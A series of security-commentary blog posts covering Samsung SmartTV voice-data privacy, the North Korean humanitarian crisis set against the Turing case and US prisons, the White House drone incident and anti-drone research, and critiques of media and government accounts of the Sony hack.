Nice attempt at raising awareness. Kudos for that. The first thing that jumps out at me is how vague the terms are. Second I noticed controls appear to be weak, or at least buried in some menu somewhere (“activated using your remote!” is basically meaningless). Third, Samsung clearly tries to dissuade you from disabling voice monitoring.

If you do not enable Voice Recognition, you will not be able to use interactive voice recognition features, although you may be able to control your TV using certain predefined voice commands. While Samsung will not collect your spoken word, Samsung may still collect associated texts and other usage data so that we can evaluate the performance of the feature and improve it.

You may disable Voice Recognition data collection at any time by visiting the “settings” menu. However, this may prevent you from using all of the Voice Recognition features.

So that’s a warning that your data can go somewhere, who knows where. On the other hand if you disable data collection you may be prevented from using all the features. Don’t you want all the features? Awful choice we have to make.

Samsung product management should be held accountable for a triad of failures. Really, a TV product manager should be in serious hot water. It is embarrassing in 2015 for a consumer product company of any size to make this large a mistake. We faced these issues at Yahoo product security ten years ago and I am seriously disappointed in Samsung. That also is why I find growing public outrage encouraging.

yahooTV
Yahoo! 2006 “Connected Life” Internet TV device

At Yahoo we had a large team focused on user privacy and safety. Research on Internet TV found novelty in a shared device with individual user privacy needs. On the mobile phone product managers could tell me “there is always only one user” and we would debate multi-user protections. But on the TV, oh the TV was different: multi-user risks were obvious to product managers and it was easy for them to take notice. The outrage against Samsung was easily predictable and avoidable.

Take for example typing your password on a big screen menu in front of a room. Everyone can see. The solution I created a decade ago was based on a simple concept: move user information to a disposable/agile security model instead of an expensive/static one. We developed a throwaway token option to register an account on the big screen instead of asking for a sensitive password.

Type your password into a private system, such as a laptop or phone, and the system sends you a number. You enter that number into the TV. Doesn’t matter if anyone sees the number. That was 2006 as we worked with TV manufacturers on how to keep data in public rooms on shared devices private. Yahoo dominated the Internet share of accounts (2 billion users) around this time so nearly every manufacturer would come through our process. Thus we could try to consult with them before bad code or devices were released.

Samsung should thought this through better on their own by now. For example commands used for the TV could require a keyword to “markup” listening, such as “Hello Samsung” and “Goodbye”. That phrase is basically never going to come up in casual conversation. Phones already do this. Remember CB radio? Lots of good verbal markup ideas there and who wouldn’t enjoy talking to their TV like a trucker?

Also important is visual indication that the TV is listening, such as an annoyingly bright LED that can’t be missed. And third a physical disable switch with tactic and visual feedback would be nice; like switching off an old Marshall amplifier. Perhaps a switch on the remote or a button that lights up like a big red “recording” indicator. And this doesn’t even get into fun answers to how the data is protected in memory, storage and over the wire.

Unfortunately Samsung just gave themselves a black eye instead. I would not buy another product from them until I have hard evidence their product management runs through a legitimate security team/review process. In fact I am now disposing of the Samsung device I did own and there’s a very high chance of migrating to another manufacturer.

Just for some comparison, notice how the camera and facial recognition were described:

Vague:

Your SmartTV is equipped with a camera that enables certain advanced features, including the ability to control and interact with your TV with gestures and to use facial recognition technology to authenticate your Samsung Account on your TV. The camera can be covered and disabled at any time, but be aware that these advanced services will not be available if the camera is disabled.

Specific:

The camera situated on the SmartTV also enables you to authenticate your Samsung Account or to log into certain services using facial recognition technology. You can use facial recognition instead of, or as a supplementary security measure in addition to, manually inputting your password. Once you complete the steps required to set up facial recognition, an image of your face is stored locally on your TV; it is not transmitted to Samsung. If you cancel your Samsung Account or no longer desire to use facial recognition, please visit the applicable settings menu to delete the stored image. While your image will be stored locally, Samsung may take note of the fact that you have set up the feature and collect information about when and how the feature is used so that we can evaluate the performance of this feature and improve it.


Updated Feb 23: David Lodge has dumped the network traffic and proved that it is indeed capturing and sending unencrypted text to Samsung. He writes:

What we see here is not SSL encrypted data. It’s not even HTTP data, it’s a mix of XML and some custom binary data packet.

The sneaky swines; they’re using 443/tcp to tunnel data over; most likely because a lot of standard firewall configurations allow 80 and 443 out of the network. I don’t understand why they don’t encapsulate it in HTTP(S) though.

Anyway, what we can see is it sending a load of information over the wire about the TV, I can see its MAC address and the version of the OS in use. After the word buffer_id is a load of binary data, which looks audio-ish, although I haven’t delved further into it yet.

Then, right at the bottom, we have the results:

sneaky swines

Posted in Security.


The DPRK Humanitarian Crisis

In private circles I was agitating for a while on the humanitarian crisis in North Korea. Although I have collected a bit of data and insights over the years it just hasn’t seemed like the sort of thing people were interested in or asking about. Not exactly good conversation material.

Then earlier this year I was at Bletchley Park and reading about Alan Turing. A quote of his prompted me to post my thoughts here on North Korea’s humanitarian crisis. Turing said basically (paraphrasing)

I helped my country defeat the Nazis, who used chemical castration to torture people including gays and Jews. In 1952 my country wants to give me the same treatment as a form of “managing” gays.

Turing’s life story was not well known until long after he died. And as we learn more about his tragic end it turns out despite exceptional service to his country he was horribly misunderstood and mistreated. He fought to preserve dignity against spurious charges; his social life and personal preferences caused him much trouble with British authorities. Turing was under constant surveillance and driven into horrible despair. After suffering effects of chemical castration, required by a court order, he committed suicide.

I’ll write more about the Turing incident on another post. Suffice it to say here that in the 1950s there was an intense fear-mongering climate against “gay communist” England. Thousands of men were sent to prison or chemically castrated without any reasonable cause.

Between 1945 and 1955 the number of annual prosecutions for homosexual behaviour rose from 800 to 2,500, of whom 1,000 received custodial sentences. Wolfenden found that in 1955 30% of those prosecuted were imprisoned.

The English enacted horrible treatment, even torture, to gay men for what end exactly? Turing was baffled at being arrested for “gross indecency” not least of all because just ten years earlier he had helped his country fight to protect people against such treatment. A gruesome early death was predictable for those monitored and questioned by police, even without charges.

The reform activist Antony Grey quotes the case of police enquiries in Evesham in 1956, which were followed by one man gassing himself, one throwing himself under a train, leaving widow and children, and an 81 year old dying of a stroke before sentence could be passed.

Why do I mention this? Think about the heavily politicized reports written by Mandiant or Crowdstrike. We see China, Russia and Iran accused of terrible things as if we only should look elsewhere for harm. If you are working for one of these companies today and do not think it possible things you care about abroad could happen at home, this post is for you. I recommend you consider how Turing felt betrayed by the country he helped defend.

Given Turing’s suffering can we think more universally, more forward? Wouldn’t that serve to improve moral high-ground and justifications for our actions?

Americans looking at North Korea often say they are shocked and saddened about treatment of prisoners there. I’ll give a quick example. Years ago in a Palo Alto, California a colleague recommended a book he had just finished. He said it proved without a doubt how horrible communism fails and causes starvation, unlike our capitalism that brings joy and abundance. The obvious touch of naive free-market fervor was bleeding through so I questioned whether we should trust single-source defection stories. I asked how we might verify such data when access was closed.

I ran straight into the shock and disgust of someone as if I were excusing torture, or justifying famine. How dare I question accusations about communism, the root of evil? How dare I doubt the testimony of an escapee who suffered so much to bring us truth about immorality behind closed doors? Clearly I did not understand free market superiority, which this book was really about. Our good must triumph over their evil. Did I not see the obviously worst type of government in the world? The conversation clouded quickly with him reiterating confidence in market theory and me causing grief by asking if that survivor story was sound or complete on its own.

More recent news fortunately has brought a more balanced story than the material we discussed back then. It has become easier to discuss humanitarian crisis at a logical level since more data is available with more opportunity for analysis. Even so, the Associated Press points out that despite thousands of testimonials we still have an incomplete picture from North Korea and no hard estimates.

The main source of information about the prison camps and the conditions inside is the nearly 25,000 defectors living in South Korea, the majority of whom arrived over the last five years. Researchers admit their picture is incomplete at best, and there is reason for some caution when assessing defector accounts.

I noticed the core of the problem when watching Camp 14. This is a movie that uses first-person testimony from a camp survivor to give insights into conditions of North Korea. Testimony is presented as proof of one thing: the most awful death camps imaginable. Camp workers are also interviewed to back up the protagonist story. However a cautious observer would also notice the survivor’s view has notable gaps and questionable basis.

The survivor, who was born in the prison, says he became enraged with jealously when he discovered his mother helping his older brother. He turned in his own mother to camp authorities. That is horrible in and of itself but he goes on to say he thought he could negotiate better treatment for himself by undermining his family. Later he wonders in front of the camera whether as a young boy he might have mis-heard or mis-understood his mother; wonders if he sent his own mother to be executed in front of him without reason other than to improve his own situation.

The survivor also says one day much later he started talking to a prisoner who came from the outside, a place that sounded like a better world. The survivor plots an escape with this prisoner. The prisoner from the outside then is electrocuted upon touching the perimeter fence; the survivor climbs over the prisoner’s body, using it as insulation to free himself.

These are just a couple examples (role of his father is another, old man who rehabilitated him is another) that jumped out at me as informational in a different way than perhaps was intended. This is a survivor who describes manipulation for his own gain at the expense of others, while others in his story seem to be helping each other and working towards overall gains.

I’ve watched a lot of survivor story videos and met in person with prison camp survivors. Camp 14 did not in any way sound like trustworthy testimony. I gave it benefit of the doubt while wondering if we would hear stories of the others, those who were not just opportunists. My concern was this survivor comes across like a trickster who knows how to wiggle for self-benefit regardless of harm or disrespect to those around. Would we really treat this story as our best evidence?

The answer came when major elements of his stories appeared to have been formally disputed. He quickly said others were the ones making up their stories; he then stepped away from the light.

CNN has not been able to reach Shin, who noted in a Facebook post apologizing for the inaccuracies in his story that “these will be my final words and this will likely be my final post.”

My concern is that outsiders looking for evidence of evil in North Korea will wave hands over facts and try to claim exceptional circumstances. It may be exceptional yet without caution someone could quickly make false assumptions about the cause of suffering and act on false pretense, actually increasing the problem or causing worse outcomes. The complicated nature of the problem deserves more scrutiny than easy vilification based on stale reports from those in a position to gain the most.

One example of how this plays out was seen in a NYT story about North Korean soldiers attacking Chinese along border towns. A reporter suggested soldiers today are desperate for food because of a famine 20 years ago. The story simply did not add up as told. Everything in the story suggested to me the attackers wanted status items, such as cash and technology. Certain types of food also may carry status but the story did not really seem to be about food to relieve famine, to compensate for communist market failure.

Thinking back to Turing, how do we develop a logical framework let alone a universal one, to frame ethical issues around intervention against North Korea? Are we starting with the right assumptions as well as keeping an open mind on solutions?

While we can dig for details to shame North Korea for its prison culture we also must consider the International Centre for Prison Studies ranks the United States second only to the Seychelles in per-capita incarceration rate (North Korea is not listed). According to 2012 data almost 1% of all US citizens are in prison. Americans should think about what prison quantitative analysis shows, such as here:

incarceration_rates

There also are awful qualitative accounts from inside the prisons, such as the sickening Miami testimony by a former worker about killing prisoners through torture, and prisoner convictions turning up to have zero integrity.

Human Rights Watch asked “How Different are US Prisons” given that federal judges have called them a “culture of sadistic and malicious violence”. Someone even wrote a post claiming half of the world’s worst prisons are in the US (again, North Korea is not listed).

And new studies tell us American county jails are run as debtor prisons; full of people guilty of very minor crimes yet kept behind bars by court-created debt.

Those issues are not lost to me as I read the UN Report of the Commission of Inquiry on Human Rights in the Democratic People’s Republic of Korea. Hundreds of pages give detailed documentation of widespread humanitarian suffering.

Maintaining a humanitarian approach, a universal theory of justice, seems like a good way to keep ourselves grounded as we wade into understanding crisis. To avoid the Turing disaster we must keep in mind where we are coming from as well as where we want others to go.

Take for example new evidence from a system where police arrest people for minor infractions and hold them in fear and against their will, in poor conditions without representation. I’ll let you guess where such a system exists right now:

They are kept in overcrowded cells; they are denied toothbrushes, toothpaste, and soap; they are subjected to the constant stench of excrement and refuse in their congested cells; they are surrounded by walls smeared with mucus and blood; they are kept in the same clothes for days and weeks without access to laundry or clean underwear; they step on top of other inmates, whose bodies cover nearly the entire uncleaned cell floor, in order to access a single shared toilet that the city does not clean; they develop untreated illnesses and infections in open wounds that spread to other inmates; they endure days and weeks without being allowed to use the moldy shower; their filthy bodies huddle in cold temperatures with a single thin blanket even as they beg guards for warm blankets; they are not given adequate hygiene products for menstruation; they are routinely denied vital medical care and prescription medication, even when their families beg to be allowed to bring medication to the jail; they are provided food so insufficient and lacking in nutrition that inmates lose significant amounts of weight; they suffer from dehydration out of fear of drinking foul-smelling water that comes from an apparatus on top of the toilet; and they must listen to the screams of other inmates languishing from unattended medical issues as they sit in their cells without access to books, legal materials, television, or natural light. Perhaps worst of all, they do not know when they will be allowed to leave.

And in case that example is too fresh, too recent with too little known, here is a well researched look at events sixty years ago:

…our research confirms that many victims of terror lynchings were murdered with out being accused of any crime; they were killed for minor social transgressions or for demanding basic rights and fair treatment.
[…]
…in all of the subject states, we observed that there is an astonishing absence of any effort to acknowledge, discuss, or address lynching. Many of the communities where lynchings took place have gone to great lengths to erect markers and monuments that memorialize the Civil War, the Confederacy, and historical events during which local power was violently reclaimed by white Southerners. These communities celebrate and honor the architects of racial subordination and political leaders known for their belief in white supremacy. There are very few monuments or memorials that address the history and legacy of lynching in particular or the struggle for racial equality more generally. Most communities do not actively or visibly recognize how their race relations were shaped by terror lynching.
[…]
That the death penalty’s roots are sunk deep in the legacy of lynching is evidenced by the fact that public executions to mollify the mob continued after the practice was legally banned.

The cultural relativity issues of our conflict with North Korea are something I really haven’t seen anyone talking about anywhere, although it seems like something that needs attention. Maybe I just am not in the right circles.

Perhaps I can put it in terms of a slightly less serious topic.

I often see people mocking North Korea for a lack of power and for living in the dark. Meanwhile I never see people connect lack of power to a June 1952 American bombing campaign that knocked out 90% of North Korea’s power infrastructure. This is not to say bomb attacks from sixty years ago and modern fears of dependency on infrastructure are directly related. It is far more complex.

However it stands to reason that a country in fear of infrastructure attacks will encourage resiliency and their culture shifts accordingly. A selfish dictator may also encourage resiliency to hoard power, greatly complicating analysis. Still I think Americans may over-estimate the future for past models of inefficiencies and dependency on centralized power. North Korea, or Cuba for that matter, could end up being global leaders as they figure out new decentralized and more sustainable infrastructure systems.

Sixty years ago the Las Vegas strip glare and consumption would be a marvel of technology, a show of great power. Today it seems more like an extravagant waste, an annoyance just preventing us from studying the far more beautiful night sky full of stars that need no power.

Does this future sound too Amish? Or are you one of the people ranking the night sky photos so highly that they reach most popular status on all the social sites? Here’s a typical 98.4% “pulse” photo on 500px:

nightlake-hipydeus
Night at the Lake by hipydeus

Imagine what Google Glass enhanced for night-vision would be like as a new model. Imagine the things we would see if we reversed from street lights everywhere, shifting away from cables to power plants, and went towards a more generally sustainable/resilient goal of localized power and night vision. Imagine driving without the distraction of headlights at night, with an ability to see anyway, as military drivers around the world have been trained…

I’ll leave it at that for now. So there you have a few thoughts on humanitarian crisis, not entirely complete, spurred by a comment by Turing. As I said earlier, if you are working at Mandiant or Crowdstrike please think carefully about his story. Thanks for reading.

Posted in Security.


A Remote Threat: The White House Drone Incident

Have you heard the story about a drone that crashed into the White House yard?

Wired has done a follow-up story, drawing from a conference to discuss drone risks.

The conference was open to civilians, but explicitly closed to the press. One attendee described it as an eye-opener.

Laughably Wired seems to quote just one anonymous attendee as payback for lack of access to the event. Who was this attendee? Why was it an eye-opener?

In my conference talks for the past few years I explicitly mentioned attacks on auto-auto (self-driving cars) based on our fiddling with drones. Perhaps we are not getting much attention, despite doing our best to open eyes. Instead of some really scary stuff the Wired perspective looks only at a very limited and tired example.

But the most striking visual aid was on an exhibit table outside the auditorium, where a buffet of low-cost drones had been converted into simulated flying bombs. One quadcopter, strapped to 3 pounds of inert explosive, was a DJI Phantom 2, a newer version of the very drone that would land at the White House the next week.

Ok, surely that’s not the most striking visual aid. I would be happy to give any journalist multiple reasons why a drone with 3 pounds of explosive does not present the most difficult defensive situation. In fact on the scale of things I would want to build defenses against, a bomb drone seems very easily within reach. There are far, far more troubling ones, which is why I have been giving presentations on the risks and what defenders could do to about them (Blackhat, CONFidence).

We also have tweeted about taking over the skyjack drone by manipulating its attack script flaw, essentially a mistake in radio logic. A drone on autopilot using a mapped GPS would be straightforward to defeat, which we also have had some fun discussions about, at least in terms of ships (flying in water, get it?). And then there is Lidar jamming…

Anyway back in April of 2014 I had tweeted about DJI drone controls and no waypoint zones. The drone company was expressing a clear global need to steer clear of airports. Thought I should call attention to our 2014 research and this detail as soon as I saw the White House news so I replied to some tweets.

dtweet6

Nine retweets!? Either I was having a good day or the White House raises people’s attention level. Maybe we can blow off all our talking about this in the past because someone just flew a drone into the wrong yard. It’s a whole new ballgame of awareness. While the White House drone incident could cause a backlash on drone manufacturers for lack of zone controls, the incident also brings a much needed inflection point at the highest and broadest levels, which is long overdue.

Our culture tends to leave the market to harm the average person because let them figure it out. Once a top-dog, a celebrity with everything, is harmed or threatened then things get real. It is like we say “if they can’t defend, no one could” and so the regulatory wheels start to spin.

An incident with zero impact that can raise awareness sounds great to me. As I explained to a FCC Commissioner last year, American regulation is driven by celebrity events. This one was pretty close and may get us some good discussion points. That is why I see this incident finally bringing together at least three phases of drone enthusiast. Fresh and new people will be stepping into the ring to tinker and offer innovative solutions; old military and scientific establishment folks (albeit with some VIP nonsense and closed-door snafus) will come out of the woodwork to ask for a place in the market; and of course those who have been fiddling away for a while without much notice will take a deep-breath, write a blog post and wonder who will read it this time.

Three drone enthusiast profiles

Last year I sauntered into a night-time drone meetup in San Francisco. It was sponsored by a high-powered east-coast pseudo-governance organization. And when I say drone meetup, I am not just talking about the lobbyist drone in fancy clothes who talked about bringing “community” closer to the defense industry “shared-objectives” (“you are getting very sleepy”). I am talking about a room stuffed with people interested in pushing technology boundaries, mostly in the air. Several observations about that meetup I would like to share here. Roughly speaking I found the audience fit into these interest levels:

  • Profile 1: The hobbyists seemed easily annoyed by thinking about risks. This is typical in technology meetups that bring developers together. Some people look at the clouds above the picnic, some look at the ants. The new drone meetups almost always are filled with cloud watchers.
    Others would ask me “what’s your rig” or “what do you pilot” to talk shop. I would reply “Sorry, not a pilot, I study using ground control to remove drones from the air”. This went over like a lead balloon. You could sense the deflation in mood.
    When I was asked “why would anyone want to do that” my response was “I have no idea. There are so many possible reasons.” My area of study is not focused on why. I want to know how. So I told people “When somebody decides why a drone needs to be stopped, I would like us to avoid any panic about how.”
    Although the hobbyists had some amazing ideas about drones changing the world for the better, I was doing my duty to ask “why” and “is that safe” at strategic points in the conversation.
  • Profile 2: The professionals were swapping stories about success and failures in the ancient past. This crowd was jaded already. As per usual those with field-experience had a veritable gold-mine of lessons not widely shared. A favorite of mine was when a guy who built private gas-leak drones made them “too accurate”. He forced the power company (PG&E) to admit their existing sensors (mostly manual, staff in vehicles) were dangerously out-dated. Better sensor technology was meant to be a sales strategy for this drone professional yet the quality gap he opened between old and new was so large PG&E was angry; fought back instead of buying-in.
    Another great story was when a drone had flown throughout mines and laser-mapped them. Software stitching together photos with maps, using a large cloud compute cluster, inexpensively created a 3D world of a hazardous cave to be enhanced with environmental details. New business models were being explored around providing geology maps to FPS gaming companies, or architects planning new construction. Want to see how your new underground restaurant looks at 5:30PM as the sun sets, or with a morning rain-storm? Click, click now you can walk through, just like a drone already has.
    Another was pure surveillance, although the story was told as “tourism”. Go to visit a monument, take a few photos. Nice. Now pull out your pocket drone, take a few thousand pictures and have a perfect 3D model you can replicate later. Throw up a drone on a specific route to 3D map anything. Statues, machines, buildings…it comes back with data you download, process and can use to build or model perfectly anything the drone “sees” on its little vacation. Since the processing story was last year I have to also point out this year drones started processing all the data in real-time as they fly.
  • Profile 3: The lobbyist was annoyed about risks like the hobbyists, although she blended in hard-lessons from Profile 2. It was bridging reality of risks with promise of new sales.
    She was of the opinion that the US military was light-years ahead of hobbyists in drone-building and flying. Been there done that, they had forged a business model and their engineers therefore should rule the technology leadership roost into the next business models. However she came to SF to openly admit the military-industrial-complex has become so used to handouts from government they felt a bit worried about missing the boat on consumer markets.
    Someone recognized a strong Profile 2 (seasoned story-telling) had been missing from their lobbyist toolkit for the coming commercial boom. A flood of new talent was scooping up drone kits and toys, quickly threatening to dwarf the proprietary market cap. The lobbyist was talking about synergies and collaborations. Although let’s be honest, she is a lobbyist. She also was testing the water for an exit from big old federal government money into even bigger global commercial money. She just didn’t know yet who she should focus her pleadings on most.

You could smell a three-way collision (at least, maybe more) brewing and bubbling, yet groups still stood far apart at this meetup. Political stakes were increasing: money and ideas starting to flow, old power brokers worried about disruption, combined with seasoned vets sprinkling around guidance on where to go with the technology and new horizons. This is how things have evolved for many years; it just didn’t seem quite yet the time for collaboration.

Bringing Profiles Together

Going way, way back, I remember as a child when my grandfather handed me a drone he had built (mostly ruined, actually, but let’s just pretend he made it better). Having a grandfather who built drones did not seem all that special. Model trains, airplanes, boats…all that I figured to be the purview of old people fascinated with making big technology smaller so they could play with it. Kind of like the bonzai effect, I guess. I fast-forward to today and I realize he might have been a little exceptional. Groups everywhere growing consistently larger and more committed to drones, albeit they seem separate and distinct from each other, not part of everyday life.

As popularity increases, so does the question of how all the pieces and parties should work together better. Roombas aside, my theory is the future looks incredibly bright if people start working together on ethics and politics in the bigger picture, including risks. I wasn’t going to fall for the Profile 3 lobbyist pitch (who was?). However, I was excited by some of the groups and discussions.

Speaking of way back, in 2013 I found my long-time drone interests leading into tweets useful at work. I thought Twitter might help with converging risk discussions into after-hours meetups, like talking about the forward-thinking people in Iowa demanding no-drone zones.

dtweet1

Clearly my humor did not win anyone’s attention. Not a single retweet or favorite. Crickets.

It also may just be that Twitter sucks as a platform and I have no followers. That’s probably why I’m back to blogging again more. Does anyone find Tweets conducive to real conversation? The best Twitter seems to do for me is to shift conversation by allowing me to throw a fact in here or there, like I sit quietly with my remote Twitter control, every so often dropping stones into the Twitter pond.

When a news story broke in 2013 I had to jump in and say “hey, cool Amazon hobbyist (new) story and I think you could be overlooking a FedEx lobbyist (old) story”.

dtweet2

I was poking around some loopholes too, wondering whether the drones over SF could have a get-out-of-jail card if we wanted to take them down.

dtweet3

Kudos to Sina and Jack for the conversation. My tweets were at least reaching two or three people at this point.

And as anti-drone laws were popping up I occasionally would mention my research in public. Alaska wanted a law to make sure hunters could not use drones for unfair advantage.

Such a rule seemed ironic, considering how guns have made killing a “sport” nearly anyone can “play”. A completely unbalanced and technology-laden air/ground/sea attack strategy on nature was common talk, at least when I was in Alaska. Anyway someone thought drones were taking an already automated sport of killing too far.

Illinois took the opposite approach to Alaska. Someone saw drones as potential interference to those out for a killing.

dtweet4

By April of 2014 I had built up a fair amount of detail on no-fly zones and strategies. We ran drones for testing and anti-drone antenna prototypes were being discussed. I gave myself a challenge: get a talk accepted and then publish an anti-drone device, similar to anti-aircraft, for the hobbyist or average home user.

Here’s a good picture of where I was coming from on this idea. One of the top drone manufacturers was telling me their drones were absolutely not going to stray into no-fly zones. What if they did anyway? Ethics were easy in this space. A system to respond seemed most clearly justified.

dtweet5

Haha. “No-way points” get it? No? That’s ok, no one did. Not a single re-tweet or favorite for that map. It wasn’t completely lost on people, however. A little exposure meant I was called in for a short Loopcast episode, called Drone Hacking, which I suppose a few people might have heard. The counter says 162,000 plays so far, which seems impossible. Maybe drones are listening.

Anyway my big plan to release our research at a conference was knocked down when the Infiltrate voting system denied us a spot. We were going to show how we immediately, and I mean immediately, found a way to take-over the Skyjack drones. We wanted to talk about command and control, redirection and all kinds of fun stuff. Denied.

I resubmitted the same ideas to CanSecWest and again was denied. This pretty-much shelved my excitement to explain more details and spend time in a formal public space. After all, my focus was more on the larger picture of big data and less on individual sensors. That’s why you’ll see drone information woven into in my big data security talks and writings.

Although at last year’s EMCworld I put a guy on my staff dedicated to drones — running a bunch of cool tests and achieving real pilot skills — it still wasn’t brought out publicly as much as I would have liked. Timing still felt early, as if journalists were apprehensive and various groups too separated to generate a nice broad and general audience story. Our conference was explicitly open to the press yet we were without any major celebrity-level disaster driving attendees. Maybe this year…

Posted in Security.


Beware the Sony Errorists

A BBC business story on the Sony breach flew across my screen today. Normally I would read through and be on my way. This story however was so riddled with strange and simple errors I had to stop and wonder; who really reads this without pause? Perhaps we need a Snopes of theories on hackers.

A few examples

Government-backed attackers have far greater resources at their disposal than criminal hacker gangs…

False. Criminal hacker gangs can amass far greater resources more quickly than government-backed ones. Consider how criminal gangs operate relative to the restrictions of the “governed”. Government-backed groups have constraints on budget, accountability, jurisdiction…. I am reminded of the Secret Service agent who told me how he had to scrape and toil for months to bring together an international team with resources and approval. Finally getting approval his group descended in a helicopter onto the helipad of a criminal property that was literally a massive gilded castle surrounded by exotic animals and vehicles. Gov agencies were outclassed on almost every level yet careful planning, working together and correct timing were on their side. The bust was successful despite strained resources across several countries.

Of course it is easy to find opposite examples. The government invests in the best equipment to prepare for some events and clearly we see “defense” budgets swell. This is not the point. In many scenarios of emerging technology you find innovation and resources are handled better by criminal gangs who lack constraints of being governed — criminals can be as lavish or unreasonable as they decide. Have you noticed anyone lately talking about how Apple or Google have more money than Russia?

Government-backed hackers simply won’t give up…

False. This should be self-evident from the answer above. Limited resources and even regime change are some of the obvious reasons why government-backed anything will give up. In the context of North Korea, let alone wider history of conflict, we only have to look at a definition of the current armistice that is in place: “formal agreement of warring parties to stop fighting”.

Two government-backed sides in Korea formally “gave up” and signed an armistice agreement July 27, 1953. At 10 a.m..

Perhaps some will not like this example because North Korea is notorious for nullifying the armistice as a negotiation tactic. Constant reminders of its intent for reunification seem like it has refused to give up. I’d disagree, on the principle of what armistice means. Even so let’s consider instead the U.S. role in Vietnam. On January 27, 1973 an “Ending the War and Restoring Peace in Viet-Nam” Agreement was signed by the U.S. and others in conflict; by the end of 1973 the U.S. had unquestionably given up attacks and three years later North and South were united.

I also am tempted to point to famous pirates (Ching Shih or Peter Easton) who “gave up” after a career of being sponsored by various states to attack others. They simply inked a deal with one sponsor to retire.

“What you need is a bulkhead approach like in a ship: if the hull gets breached you can close the bulkhead and limit the damage…

True with Serious Warning. To put it simply, bulkheads are a tool, not a complete solution. This is the exact mistake that led to the Titanic disaster. A series of bulkheads (with some fancy new technology hand-waving of the time) were meant to keep the ship safe even when breached. This led people to refer to the design as “unsinkable”. So if the Titanic sank how can bulkheads still be a thing to praise?

I covered this in my keynote presentation for the 2010 RSA Conference in London. Actually, I wasn’t expecting to be a keynote and packed my talk with details. Then I found myself on main stage, speaking right after Richard Clarke, which made it awkward to fit in my usual pace of delivery. Anyway, here’s a key slide of the keynote.

B8-T_gPIQAEKjaw

The bulkheads gave a false sense of confidence, allowing a greater disaster to unfold for a combination of reasons. See how “wireless issues” and “warnings ignored” and “continuing to sail” and “open on top” start to add up? In other words if you hit something and detect a leak you tend to make an earlier assessment and a more complete one — one that affects the whole ship. If you instead think “we’ve got bulkheads keep going” a leak that could be repaired or slowed turns very abruptly into a terminal event, a sinking.

Clearly Sony had been breached in one of their bulkheads already. We saw the Playstation breach in 2011 have dramatic and devastating impact. Sony kept sailing, probably with warnings ignored elsewhere, communications issues, and thinking improvements in one bulkhead area of the company was sufficient. Another breach devastated them in 2013 and they continued along…so perhaps you can see how bulkheads are a tool that offer great promise yet require particular management to be effective. Bulkheads all by themselves are not a “need”. Like a knife, or any other tool that makes defense easier, what people “need” is to learn how to use them properly — keep the pointy side in the right direction.

Another way of looking at the problem

The rest of the article runs through a mix of several theories.

One theory mentioned is to delete data to avoid breaches. This is good specific advice, not good general advice. If we were talking about running out of storage room people may look at deletion as a justified option. If the data is not necessary to keep and carries a clear risk (e.g. post-authorization payment card data fines) then there is a case to be made. And in the case of regulation then the data to be deleted is well-defined. Otherwise deleting poorly-defined data actually can make things worse through rebellion.

A company tells its staff that the servers will be purging data and you know what happens next? Staff start squirreling away data on every removable storage devices and cloud provider they can find because they still see that data as valuable, necessary to be successful, and there’s no real penalty for them. Moreover, telling everyone to delete email that may incriminate is awkward strategy advice (e.g. someone keeps a copy and you delete yours, leaving you without anything to dispute their copy with). Also it may be impossible to ask this of environments where data is treated as a formal and permanent record. People in isolation could delete too much or the wrong stuff, discovered too late by upper management. Does that risk outweigh the unknown potential of breach? Pushing a risk decision away from the captain of a ship and into bulkheads without good communication can lead to Titanic miscalculations.

Another theory offered is to encrypt and manage keys perfectly. Setting aside perfect anything management, encryption is seriously challenged by an imposter event like Sony. A person inside an environment can grab keys. Once they have the keys they have to be stopped by a requiring other factors of identification. Asking the imposter to provide something they have or something they are is where the discussion often will go — stronger authentication controls both to prevent attacks spreading and also to help alert management to a breach in progress. Achieving this tends to require better granularity in data (fewer bulkheads) and also more of it (fewer deletions). The BBC correctly pointed out that there is balance yet by this point the article is such a mess they could say anything in conclusion.

What I am saying here is think carefully about threats and solutions if you want to manage them. Do not settle on glib statements that get repeated without much thought or explanation, let alone evidence. Containment can work against you if you do not manage it well, adding cost and making a small breach into a terminal event. A boat obviously will use any number of technologies, new and old, to keep things dry and productive inside. A lot of what is needed relates to common sense about looking and listening for feedback. This is not to say you need some super guru as captain; rather it is the opposite. You need people committed to improvement, to reporting things are not as they should be, in order to achieve a well-run ship.

Those are just some quick examples above and how I would position things differently. Nation-states are not always in a better position. Often they are hindered. Attackers have weaknesses and commitments. Finding a way to make them stop is not impossible. And ultimately, throwing around analogies is GREAT as long as they are not incomplete or applied incorrectly. Hope that helps clarify how to use a little common sense to avoid errors being made in journalist stories on the Sony breach.

Posted in Security.


Gov Fumbles Over-Inflated Sony Hack Attribution Ball

This (draft) post basically comes after reading one called “The Feds Got the Sony Hack Right, But the Way They’re Framing It Is Dangerous” by Robert Lee. Lee stated:

At its core, the debate comes down to this: Should we trust the government and its evidence or not? But I believe there is another view that has not been widely represented. Those who trust the government, but disagree with the precedent being set.

Lee is not the only person in government referring to this core for the debate. It smacks of being forced by those in government to choose one side or the other, for or against them. Such a binary depiction of governance, such a call for obedience, is highly politically charged. Do not accept it.

I will offer two concepts to help with the issue of choosing a path.

  1. Trust but Verify (As Gorbachev Used to Tell Reagan)
  2. Agile and Social/Pair Development Methods

So here is a classic problem: non-existent threats get over inflated because of secret forums and debates. Bogus reports and false pretense could very well be accidents, to be quickly corrected, or they may be intentionally used to justify policies and budgets requiring more concerted protest.

If you know the spectrum are you actually helping improve trust in government overall by working with them to eliminate error or correct bias? How does trusting government and its evidence while also wanting to also improve government fit into the sides Lee quotes? It seems far more complicated than writing off skeptics as distrustful of government. It also has been proven that skeptics help preserve trust in government.

Take a moment to look back at a false attribution blow-up of 2011:

Mimlitz says last June, he and his family were on vacation in Russia when someone from Curran Gardner called his cell phone seeking advice on a matter and asked Mimlitz to remotely examine some data-history charts stored on the SCADA computer.

Mimlitz, who didn’t mention to Curran Gardner that he was on vacation in Russia, used his credentials to remotely log in to the system and check the data. He also logged in during a layover in Germany, using his mobile phone. …five months later, when a water pump failed, that Russian IP address became the lead character in a 21st-century version of a Red Scare movie.

Everything deflated after the report was investigated due to public attention. Given the political finger-pointing that came out afterwards it is doubtful that incident could have received appropriate attention in secret meetings. In fact, much of the reform of agencies and how they handle investigations comes as a result of public criticism of results.

Are external skepticism and interest/pressure the key to improving trust in government? Will we achieve more accurate analysis through more parallel and open computations? The “Big Data” community says yes. More broadly speaking so many have emulated the Aktenzeichen XY … ungelöst “help police solve crimes” TV show since it started in 1967, a general population also probably would agree.

Trust but Verify

